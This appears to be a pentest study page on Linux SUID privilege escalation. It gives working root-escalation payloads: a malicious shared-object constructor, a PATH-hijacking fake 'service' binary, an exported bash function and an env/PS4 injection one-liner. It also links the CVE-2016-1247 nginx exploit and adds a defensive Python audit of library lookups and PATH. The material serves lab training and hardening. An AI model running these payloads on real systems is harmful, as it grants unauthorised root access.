# SUID

## Enumeration

* `find / -perm -u=s -type f 2>/dev/null` lists every file with the SUID bit set
* The SUID bit shows up as an `s` in the owner's execute position of the permissions, like here:\
  ![image](https://user-images.githubusercontent.com/96747355/167308910-5b0a0157-6586-46bd-a213-42c229e996e8.png)

## Exploitation

* Here again we can use [GTFOBins](https://gtfobins.github.io/#+suid) to check whether the binary is listed there with a documented SUID exploitation

## Practice

* You can see an example of this exploit in [this writeup](/pentips/writeups/thmwriteups/thm-vulnversity.md)

## SUID - Shared Object Injection

### Enumeration

* `find / -type f -perm -04000 -ls 2>/dev/null`
* `ls -al nameoffile`

### Exploitation

* In our example the file is `/usr/local/bin/suid-so`
* `strace /usr/local/bin/suid-so 2>&1`, or with a grep on what could be interesting `strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"`, shows which files the binary tries to open. This is where we check whether we have write access to one of the files it uses (or to the directory it looks in). In our example we will use the file from this output line: `open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)`
* Once we find such a file we can create or overwrite it with a payload to elevate our privileges

```c
#include <stdio.h>
#include <stdlib.h>

/* Constructor: runs automatically when the shared object is loaded, before main() */
static void inject(void) __attribute__((constructor));

void inject(void) {
    /* Executes with the effective uid of the SUID binary that loaded the library */
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
```

* We create the directory the binary looks in (`/home/user/.config` in our example)
* We compile our file with `gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/libcalc.c`; in my example the file I will overwrite is `/home/user/.config/libcalc.so`
* This way we just need to run the SUID file, which is `/usr/local/bin/suid-so` in our example
* And it should give us a root prompt\
  ![image](https://user-images.githubusercontent.com/96747355/170128114-817d12e9-27bf-429c-9682-6e29222cdcb4.png)

## SUID - Binary Symlinks

* This one relies on an issue in how nginx handles the log files it creates (CVE-2016-1247)

### Enumeration

* Running `./linuxexploitsuggester.sh` should give this output: `[+] [CVE-2016-1247] nginxed-root.sh`. Alternatively, we can look for this specific vulnerability manually by checking the nginx version with `dpkg -l | grep nginx`
* Now we need to check whether the SUID bit is set on `sudo`: `find / -type f -perm -04000 -ls 2>/dev/null` or `ls -al /usr/bin/sudo`

### Exploitation

* `ls -al /var/log/nginx`
* We will need to create a malicious symlink
* We will use [this](https://github.com/xl7dev/Exploit/blob/master/Nginx/nginxed-root.sh) to do so
* `./nginxed-root.sh /var/log/nginx/error.log`
* Once nginx is restarted, we will be root\
  ![image](https://user-images.githubusercontent.com/96747355/170131842-3acc1171-23de-4d18-9691-167cf4649cc6.png)
* Check out [this resource](https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html) to learn more about this way to escalate

## SUID - Environmental Variables

### Enumeration

* `find / -type f -perm -04000 -ls 2>/dev/null` lists the SUID files; we then check which of them rely on environment variables. In our example we have `/usr/local/bin/suid-env`, which launches apache via `service` (we know this by running `strings` on the file).\
  ![image](https://user-images.githubusercontent.com/96747355/170258997-532e61be-117c-4e9f-9ad9-a4e6c0644716.png)

### Exploitation

* Let's create a malicious `service` binary and put its directory first in our PATH so that it is launched instead of the real `service` command that starts apache
* `printf '%s\n' '#include <stdlib.h>' '#include <unistd.h>' 'int main() {setgid(0); setuid(0); system("/bin/bash"); return 0;}' > /tmp/service.c` (the two includes are needed so that current gcc versions accept the implicit `setgid`/`setuid`/`system` calls)
* `gcc /tmp/service.c -o /tmp/service`
* We now need to change our path `export PATH=/tmp:$PATH`\
  ![image](https://user-images.githubusercontent.com/96747355/170260619-089f2ad9-71ae-4dea-8283-a40ddbb0e5a7.png)
* And now we just need to run the binary `/usr/local/bin/suid-env` to escalate to root\
  ![image](https://user-images.githubusercontent.com/96747355/170260873-6b5fa24d-658b-4ba2-b2a1-f2662a4ba839.png)
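
As an added defensive example, not part of the original notes, the following Python audits the two trust boundaries that the shared object injection and PATH hijack sections above rely on: it parses an strace excerpt for shared-object lookups under directories a non-root user controls, and flags PATH entries a non-root user can write to. `FAKE_FS`, `SAMPLE_TRACE` and `fake_stat` are constructed stand-ins for a live host.

```python
"""Added audit example (not the notes' own code): the two trust boundaries behind
this page's SUID findings, checked offline on constructed input: shared-object
lookups from a strace of a SUID binary, and the entries of PATH."""
import os, re, stat
# Matches open/openat/access/stat lines for *.so paths; captures path and return value.
OPEN_RE = re.compile(r'^(?:open|openat|access|stat)\((?:AT_FDCWD, )?"([^"]+\.so[^"]*)"[^=]*=\s*(-?\d+)')
TRUSTED_LIB_DIRS = ("/lib", "/lib64", "/usr/lib", "/usr/lib64", "/usr/local/lib")

def first_existing(path, stat_fn):
    """(uid, mode) of `path` or of its closest existing ancestor."""
    while path not in ("", "/"):
        try:
            return stat_fn(path)
        except FileNotFoundError:
            path = os.path.dirname(path)
    return stat_fn("/")

def user_controllable(path, stat_fn):
    """True if a non-root user can create or replace files at `path`: its closest
    existing ancestor is not root-owned or is group/world writable."""
    uid, mode = first_existing(path, stat_fn)
    return uid != 0 or bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_library_lookups(strace_output, stat_fn):
    """Library lookups that failed (the libcalc.so case above) or fall outside the
    trusted library dirs, and whose directory a non-root user controls."""
    findings = []
    for m in filter(None, map(OPEN_RE.match, strace_output.splitlines())):
        path, ok = m.group(1), int(m.group(2)) >= 0
        trusted = any(path.startswith(d + "/") for d in TRUSTED_LIB_DIRS)
        if (not ok or not trusted) and user_controllable(os.path.dirname(path), stat_fn):
            findings.append(path)
    return findings

def audit_path(path_value, stat_fn):
    """PATH entries a SUID program must not trust: relative or empty entries and
    directories a non-root user can write to (the /tmp case above)."""
    return [e or "(empty = cwd)" for e in path_value.split(":")
            if not e.startswith("/") or user_controllable(e, stat_fn)]

# Constructed filesystem view {dir: (uid, mode)} and strace excerpt; not real host data.
FAKE_FS = {"/": (0, 0o755), "/home": (0, 0o755), "/home/user": (1000, 0o755),
           "/lib": (0, 0o755), "/lib/x86_64-linux-gnu": (0, 0o755),
           "/tmp": (0, 0o1777), "/usr/bin": (0, 0o755), "/bin": (0, 0o755)}
SAMPLE_TRACE = ('open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)\n'
                'openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3\n')
def fake_stat(p):  # on a live host pass lambda p: (os.lstat(p).st_uid, os.lstat(p).st_mode)
    if p not in FAKE_FS:
        raise FileNotFoundError(p)
    return FAKE_FS[p]
```

On the constructed data `audit_library_lookups(SAMPLE_TRACE, fake_stat)` reports only `/home/user/.config/libcalc.so`, and `audit_path("/tmp:/usr/bin:/bin", fake_stat)` reports only `/tmp`, which is exactly the pair of conditions each section above abuses.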

## SUID - Environmental Variables with full path to binary

* `find / -type f -perm -04000 -ls 2>/dev/null` lists the SUID files; we then check which of them rely on environment variables. In our example we have `/usr/local/bin/suid-env2`, which launches apache by calling `service` with its full path `/usr/sbin/service` (we know this by running `strings` on the file).\
  ![image](https://user-images.githubusercontent.com/96747355/170265161-6ffb4183-13e3-418f-8317-5fb8ba1c1faf.png)
* `function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }`: since the binary calls `/usr/sbin/service` by its full path, a malicious binary in PATH will not be picked up, so instead we define a bash function with that exact name
* `export -f /usr/sbin/service` then exports the function so that child bash processes inherit it through the environment
* `/usr/local/bin/suid-env2` finally we just need to launch the service\
  **OR**
* `env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'`
